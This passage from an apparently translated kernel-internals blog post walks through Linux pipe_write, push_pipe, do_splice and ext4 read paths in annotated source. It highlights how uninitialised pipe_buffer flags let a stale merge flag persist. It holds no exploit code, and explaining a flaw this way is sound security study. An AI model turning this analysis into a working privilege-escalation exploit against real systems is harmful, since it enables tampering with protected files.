class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">        buf-&gt;ops = &amp;default_pipe_buf_ops;</span><br><span class="line">        buf-&gt;page = page;</span><br><span class="line">        buf-&gt;offset = <span class="number">0</span>;</span><br><span class="line">        buf-&gt;len = <span class="built_in">min_t</span>(<span class="type">ssize_t</span>, left, PAGE_SIZE);</span><br><span class="line">        left -= buf-&gt;len;</span><br><span class="line">        <span class="comment">/* !!! Note: the flags field of buf is NOT initialized here, so it keeps whatever flags the old pipe_buffer in this slot had */</span></span><br><span class="line">        iter_head++;</span><br><span class="line">        pipe-&gt;head = iter_head;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (left == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> size;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> size - left;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>In <code>push_pipe</code> we can see that when the kernel adds pages to pipe_buffer slots in a loop, it <strong>does not initialize the pipe_buffer flags field either</strong>! Because the pipe_buffer array is designed as a ring, every newly filled slot <strong>reuses the flags left behind by the pipe_buffer that previously occupied it</strong>.</p><blockquote><p>A brief summary of how copy_page_to_iter and copy_to_iter differ <strong>when copying data into a pipe</strong>:</p><ul><li>The former copies data that already lives on a complete page, so the pipe buf only needs to reference that page and record offset and len to finish the copy.</li><li>The latter does not assume the source data lives on a complete page; it is given addr and len instead, so the pipe buf has to provide its own page to hold the data.</li></ul></blockquote><h3 id="5-pipe-write-函数">5. 
pipe_write function</h3><p>Here we focus only on the two essential parts. The first is <strong>page merging</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">head = pipe-&gt;head;</span><br><span class="line">was_empty = <span class="built_in">pipe_empty</span>(head, pipe-&gt;tail);</span><br><span class="line">chars = total_len &amp; (PAGE_SIZE<span class="number">-1</span>);</span><br><span class="line"><span class="keyword">if</span> (chars &amp;&amp; !was_empty) &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf = &amp;pipe-&gt;bufs[(head - <span class="number">1</span>) &amp; mask];</span><br><span class="line">    <span class="type">int</span> offset = buf-&gt;offset + buf-&gt;len;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ((buf-&gt;flags &amp; PIPE_BUF_FLAG_CAN_MERGE) &amp;&amp;</span><br><span class="line">        offset + chars &lt;= PAGE_SIZE) &#123;</span><br><span 
class="line">        ret = <span class="built_in">pipe_buf_confirm</span>(pipe, buf);</span><br><span class="line">        <span class="keyword">if</span> (ret)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line"></span><br><span class="line">        ret = <span class="built_in">copy_page_from_iter</span>(buf-&gt;page, offset, chars, from);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">unlikely</span>(ret &lt; chars)) &#123;</span><br><span class="line">            ret = -EFAULT;</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        buf-&gt;len += ret;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">iov_iter_count</span>(from))</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If the pipe already holds data and the sub-page remainder of the pending write (chars, i.e. total_len modulo PAGE_SIZE) fits into the space left in the most recent pipe buf, those bytes are written straight into that pipe buf and merged with the data already there. The merge requires the pipe buf to carry the <strong>PIPE_BUF_FLAG_CAN_MERGE</strong> flag, which pipe_write sets automatically as long as the fd it is called on does not have O_DIRECT set.</p><p>The second part is the regular page write logic:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span 
class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (;;) &#123;</span><br><span class="line">    <span class="comment">// A pipe with no readers is broken, so raise SIGPIPE</span></span><br><span class="line">    <span class="keyword">if</span> (!pipe-&gt;readers) &#123;</span><br><span class="line">        <span class="built_in">send_sig</span>(SIGPIPE, current, <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">if</span> (!ret)</span><br><span class="line">            ret = -EPIPE;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Try to write data into the pipe, looping as needed</span></span><br><span class="line">    head = pipe-&gt;head;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">pipe_full</span>(head, pipe-&gt;tail, pipe-&gt;max_usage)) &#123;</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">int</span> mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf = &amp;pipe-&gt;bufs[head &amp; mask];</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">page</span> *page = pipe-&gt;tmp_page;</span><br><span class="line">        <span class="type">int</span> copied;</span><br><span class="line">        <span class="comment">// Fetch tmp_page, a page that was released earlier but kept cached.</span></span><br><span class="line">        <span class="comment">// If tmp_page exists, it is reused for the pipe buf write and no allocation is needed</span></span><br><span class="line">        <span class="keyword">if</span> (!page) &#123;</span><br><span class="line">       
     page = <span class="built_in">alloc_page</span>(GFP_HIGHUSER | __GFP_ACCOUNT);</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!page)) &#123;</span><br><span class="line">                ret = ret ? : -ENOMEM;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            pipe-&gt;tmp_page = page;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* Allocate a slot in the ring in advance and attach an</span></span><br><span class="line"><span class="comment">             * empty buffer.  If we fault or otherwise fail to use</span></span><br><span class="line"><span class="comment">             * it, either the reader will consume it or it&#x27;ll still</span></span><br><span class="line"><span class="comment">             * be there for the next write.</span></span><br><span class="line"><span class="comment">             */</span></span><br><span class="line">        <span class="built_in">spin_lock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line"></span><br><span class="line">        head = pipe-&gt;head;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">pipe_full</span>(head, pipe-&gt;tail, pipe-&gt;max_usage)) &#123;</span><br><span class="line">            <span class="built_in">spin_unlock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        pipe-&gt;head = head + <span class="number">1</span>;</span><br><span class="line">        <span class="built_in">spin_unlock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line"></span><br><span class="line">      
  <span class="comment">/* Insert it into the buffer array */</span></span><br><span class="line">        <span class="comment">// Write data into the new pipe buf</span></span><br><span class="line">        buf = &amp;pipe-&gt;bufs[head &amp; mask];</span><br><span class="line">        buf-&gt;page = page;</span><br><span class="line">        buf-&gt;ops = &amp;anon_pipe_buf_ops; <span class="comment">// Use the anonymous pipe ops</span></span><br><span class="line">        buf-&gt;offset = <span class="number">0</span>;</span><br><span class="line">        buf-&gt;len = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// If the fd has O_DIRECT set, every write takes a fresh page and is never merged</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">is_packetized</span>(filp)) </span><br><span class="line">            buf-&gt;flags = PIPE_BUF_FLAG_PACKET;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            buf-&gt;flags = PIPE_BUF_FLAG_CAN_MERGE;</span><br><span class="line">        pipe-&gt;tmp_page = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="comment">// Copy the data into the page</span></span><br><span class="line">        copied = <span class="built_in">copy_page_from_iter</span>(page, <span class="number">0</span>, PAGE_SIZE, from);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">unlikely</span>(copied &lt; PAGE_SIZE &amp;&amp; <span class="built_in">iov_iter_count</span>(from))) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!ret)</span><br><span class="line">                ret = -EFAULT;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        ret += copied;</span><br><span class="line">        buf-&gt;offset = <span class="number">0</span>;</span><br><span class="line">        
buf-&gt;len = copied;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">iov_iter_count</span>(from))</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">pipe_full</span>(head, pipe-&gt;tail, pipe-&gt;max_usage))</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Wait for buffer space to become available. */</span></span><br><span class="line">    <span class="keyword">if</span> (filp-&gt;f_flags &amp; O_NONBLOCK) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!ret)</span><br><span class="line">            ret = -EAGAIN;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">signal_pending</span>(current)) &#123;</span><br><span class="line">        <span class="keyword">if</span> (!ret)</span><br><span class="line">            ret = -ERESTARTSYS;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>A quick word on tmp_page. When a pipe buf is about to release its page, nobody else holds a reference to that page, and no tmp_page is cached yet, the page is not actually freed. Instead it is cached in tmp_page for later reuse:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">anon_pipe_buf_release</span><span class="params">(<span class="keyword">struct</span> pipe_inode_info *pipe,</span></span></span><br><span class="line"><span class="params"><span class="function">                  <span class="keyword">struct</span> pipe_buffer *buf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">page</span> *page = buf-&gt;page;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * If nobody else uses this page, and we don&#x27;t already have a</span></span><br><span class="line"><span class="comment">     * temporary page, let&#x27;s keep track of it as a one-deep</span></span><br><span class="line"><span class="comment">     * allocation cache. 
(Otherwise just release our reference to it)</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">page_count</span>(page) == <span class="number">1</span> &amp;&amp; !pipe-&gt;tmp_page)</span><br><span class="line">        pipe-&gt;tmp_page = page;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">put_page</span>(page);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>From the pipe read and write paths we can see that pipe bufs hold only two kinds of pages:</p><ol><li>Pages that directly reference some other page which must stay unmodified (for example a page cache page of a file), so no data copy is needed</li><li>Pages the pipe allocated itself, which require a data copy</li></ol><p>The pipe mechanism is supposed to guarantee that page data stored in pipe bufs is never overwritten by the pipe itself. Also <strong>note that a merge may only happen on pages the pipe allocated itself</strong>.</p></blockquote><h3 id="6-do-splice-函数">6. do_splice function</h3><p>The Linux system call <code>splice</code> moves data from one fd into another directly, without passing it through user space. It is declared as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _GNU_SOURCE         <span class="comment">/* See feature_test_macros(7) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">ssize_t</span> <span class="title">splice</span><span class="params">(<span class="type">int</span> fd_in, <span class="type">loff_t</span> *off_in, <span class="type">int</span> fd_out, <span class="type">loff_t</span> *off_out, <span class="type">size_t</span> len, <span class="type">unsigned</span> <span class="type">int</span> flags)</span></span>;</span><br></pre></td></tr></table></figure><p>Each fd here 
can only be one of two kinds, a pipe fd or a file fd (and at least one of the two must be a pipe), so do_splice checks the fd types and performs a different transfer for each combination.</p><p>Here we only care about the case where the <strong>from-fd is a file and the to-fd is a pipe</strong>, i.e. <strong>data moving from a file into a pipe</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Determine where to splice to/from.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">long</span> <span class="title">do_splice</span><span class="params">(<span class="keyword">struct</span> file *in, <span 
class="type">loff_t</span> __user *off_in,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="keyword">struct</span> file *out, <span class="type">loff_t</span> __user *off_out,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">size_t</span> len, <span class="type">unsigned</span> <span class="type">int</span> flags)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *ipipe;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *opipe;</span><br><span class="line">    <span class="type">loff_t</span> offset;</span><br><span class="line">    <span class="type">long</span> ret;</span><br><span class="line"></span><br><span class="line">    ipipe = <span class="built_in">get_pipe_info</span>(in);</span><br><span class="line">    opipe = <span class="built_in">get_pipe_info</span>(out);</span><br><span class="line">    ...;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// When data is copied from a file into a pipe</span></span><br><span class="line">    <span class="keyword">if</span> (opipe) &#123;</span><br><span class="line">        ...</span><br><span class="line">        <span class="comment">// Wait until the pipe has free space</span></span><br><span class="line">        <span class="keyword">if</span> (out-&gt;f_flags &amp; O_NONBLOCK)</span><br><span class="line">            flags |= SPLICE_F_NONBLOCK;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">pipe_lock</span>(opipe);</span><br><span class="line">        ret = <span class="built_in">wait_for_space</span>(opipe, flags);</span><br><span class="line">        <span class="comment">// Once the pipe has free space</span></span><br><span class="line">        
<span class="keyword">if</span> (!ret) &#123;</span><br><span class="line">            <span class="type">unsigned</span> <span class="type">int</span> p_space;</span><br><span class="line">            <span class="comment">// Compute how much data to transfer</span></span><br><span class="line">            <span class="comment">/* Don&#x27;t try to read more the pipe has space for. */</span></span><br><span class="line">            p_space = opipe-&gt;max_usage - <span class="built_in">pipe_occupancy</span>(opipe-&gt;head, opipe-&gt;tail);</span><br><span class="line">            len = <span class="built_in">min_t</span>(<span class="type">size_t</span>, len, p_space &lt;&lt; PAGE_SHIFT);</span><br><span class="line">            <span class="comment">// Perform the actual transfer</span></span><br><span class="line">            ret = <span class="built_in">do_splice_to</span>(in, &amp;offset, opipe, len, flags);</span><br><span class="line">        &#125;</span><br><span class="line">        ...</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Inside do_splice_to, the kernel calls the splice_read handler that the <strong>file system</strong> of the input file registered in its file operations:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Attempt to initiate a splice from a file to a pipe.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">long</span> <span class="title">do_splice_to</span><span class="params">(<span class="keyword">struct</span> file *in, <span class="type">loff_t</span> *ppos,</span></span></span><br><span class="line"><span class="params"><span class="function">             <span class="keyword">struct</span> pipe_inode_info *pipe, <span class="type">size_t</span> len,</span></span></span><br><span class="line"><span class="params"><span class="function">             <span class="type">unsigned</span> <span class="type">int</span> flags)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!(in-&gt;f_mode &amp; FMODE_READ)))</span><br><span class="line">        <span class="keyword">return</span> -EBADF;</span><br><span class="line"></span><br><span class="line">    ret = <span class="built_in">rw_verify_area</span>(READ, in, ppos, len);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(ret &lt; <span class="number">0</span>))</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(len &gt; MAX_RW_COUNT))</span><br><span class="line">        len = 
MAX_RW_COUNT;</span><br><span class="line">    <span class="comment">// Call the splice_read handler</span></span><br><span class="line">    <span class="keyword">if</span> (in-&gt;f_op-&gt;splice_read)</span><br><span class="line">        <span class="keyword">return</span> in-&gt;f_op-&gt;<span class="built_in">splice_read</span>(in, ppos, pipe, len, flags);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">default_file_splice_read</span>(in, ppos, pipe, len, flags);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Take ext4, one of the most common Linux file systems, as an example. These are some of the key methods it registers:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// fs/ext4/file.c</span></span><br><span class="line"><span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> ext4_file_operations = &#123;</span><br><span class="line">    ...</span><br><span class="line">    .read_iter    = ext4_file_read_iter,</span><br><span class="line">    ...</span><br><span class="line">    .splice_read  = generic_file_splice_read,</span><br><span class="line">    ...</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>So for an ext4 file, do_splice_to ends up calling generic_file_splice_read to carry out the transfer:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * generic_file_splice_read - splice data from file to a pipe</span></span><br><span class="line"><span class="comment"> * @in:      file to splice from</span></span><br><span class="line"><span class="comment"> * @ppos:    position in @in</span></span><br><span class="line"><span class="comment"> * @pipe:    pipe to splice to</span></span><br><span class="line"><span class="comment"> * @len:     number of bytes to splice</span></span><br><span class="line"><span class="comment"> * @flags:   splice modifier flags</span></span><br><span 
class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Description:</span></span><br><span class="line"><span class="comment"> *    Will read pages from given file and fill them into a pipe. Can be</span></span><br><span class="line"><span class="comment"> *    used as long as it has more or less sane -&gt;read_iter().</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">ssize_t</span> <span class="title">generic_file_splice_read</span><span class="params">(<span class="keyword">struct</span> file *in, <span class="type">loff_t</span> *ppos,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="keyword">struct</span> pipe_inode_info *pipe, <span class="type">size_t</span> len,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">unsigned</span> <span class="type">int</span> flags)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">iov_iter</span> to;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">kiocb</span> kiocb;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> i_head;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// build an iov_iter backed by the pipe</span></span><br><span class="line">    <span class="built_in">iov_iter_pipe</span>(&amp;to, READ, pipe, len);</span><br><span class="line">    i_head = to.head;</span><br><span class="line">    <span class="comment">// initialize the kiocb</span></span><br><span class="line">    <span 
class="built_in">init_sync_kiocb</span>(&amp;kiocb, in);</span><br><span class="line">    kiocb.ki_pos = *ppos;</span><br><span class="line">    <span class="comment">// call_read_iter performs the actual data transfer (the key step)</span></span><br><span class="line">    ret = <span class="built_in">call_read_iter</span>(in, &amp;kiocb, &amp;to);</span><br><span class="line">    <span class="comment">// the data was transferred successfully</span></span><br><span class="line">    <span class="keyword">if</span> (ret &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// update the file position and access time</span></span><br><span class="line">        *ppos = kiocb.ki_pos;</span><br><span class="line">        <span class="built_in">file_accessed</span>(in);</span><br><span class="line">    <span class="comment">// the transfer failed</span></span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (ret &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        to.head = i_head;</span><br><span class="line">        to.iov_offset = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">iov_iter_advance</span>(&amp;to, <span class="number">0</span>); <span class="comment">/* to free what was emitted */</span></span><br><span class="line">        <span class="comment">/*</span></span><br><span class="line"><span class="comment">         * callers of -&gt;splice_read() expect -EAGAIN on</span></span><br><span class="line"><span class="comment">         * &quot;can&#x27;t put anything in there&quot;, rather than -EFAULT.</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">if</span> (ret == -EFAULT)</span><br><span class="line">            ret = -EAGAIN;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>As the code shows, generic_file_splice_read ends up calling call_read_iter to transfer the data, and that function in turn calls the filesystem-specific read_iter method:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">ssize_t</span> <span class="title">call_read_iter</span><span class="params">(<span class="keyword">struct</span> file *file, <span class="keyword">struct</span> kiocb *kio,</span></span></span><br><span class="line"><span class="params"><span class="function">                     <span class="keyword">struct</span> iov_iter *iter)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> file-&gt;f_op-&gt;<span class="built_in">read_iter</span>(kio, iter);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>From <code>ext4_file_operations</code> we can see that, for ext4, call_read_iter calls ext4_file_read_iter:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">ext4_file_read_iter</span><span class="params">(<span class="keyword">struct</span> kiocb *iocb, <span class="keyword">struct</span> iov_iter *to)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *inode = <span class="built_in">file_inode</span>(iocb-&gt;ki_filp);</span><br><span class="line">    <span class="comment">// a few simple sanity checks</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(<span class="built_in">ext4_forced_shutdown</span>(<span class="built_in">EXT4_SB</span>(inode-&gt;i_sb))))</span><br><span class="line">        <span class="keyword">return</span> -EIO;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">iov_iter_count</span>(to))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>; <span class="comment">/* skip atime */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> CONFIG_FS_DAX</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">IS_DAX</span>(inode))</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">ext4_dax_read_iter</span>(iocb, to);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    <span class="keyword">if</span> (iocb-&gt;ki_flags &amp; 